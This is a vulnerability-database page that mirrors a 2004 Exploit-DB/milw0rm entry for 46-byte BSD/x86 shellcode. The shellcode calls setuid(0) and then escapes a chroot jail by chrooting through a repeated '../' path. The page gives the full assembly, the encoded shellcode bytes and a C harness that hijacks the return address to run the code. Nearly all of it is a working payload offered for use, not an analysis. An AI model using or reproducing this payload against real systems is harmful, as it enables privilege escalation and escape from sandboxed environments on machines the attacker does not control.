BSD/x86 – setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)

Vulnerability ID 1054601 Vulnerability type
Published 2004-09-12 Updated 2004-09-12
CVE ID N/A
CNNVD-ID N/A
Platform BSD_x86 CVSS score N/A
|Source
https://www.exploit-db.com/exploits/13453
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit
/* The setuid(0)+chroot() shellcode
   it will put '../' 10 times
   Size  46 bytes
   OS	 *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			[email protected] 

BITS	32

jmp short callme
main:
	pop	esi
	mov	edi,esi
	xor	ecx,ecx
	push	ecx
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	mov	cl,0x1e
	mov	al,0x2e
	repne   stosb
	pop	eax
	stosb
	mov	cl,0x1e
main_loop:
	dec	cl
	inc byte [esi+ecx]
	dec	cl
	loop	main_loop
	push 	esi
	mov	al,0x3d
	push	eax
	int	0x80
callme:
	call	main

*/
char shellcode[] =
	"\xeb\x27\x5e\x89\xf7\x31\xc9\x51\xb0\x17\x50\xcd\x80\x31\xc0"
	"\x50\xb1\x1e\xb0\x2e\xf2\xaa\x58\xaa\xb1\x1e\xfe\xc9\xfe\x04"
	"\x0e\xfe\xc9\xe2\xf7\x56\xb0\x3d\x50\xcd\x80\xe8\xd4\xff\xff"
	"\xff";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-12]
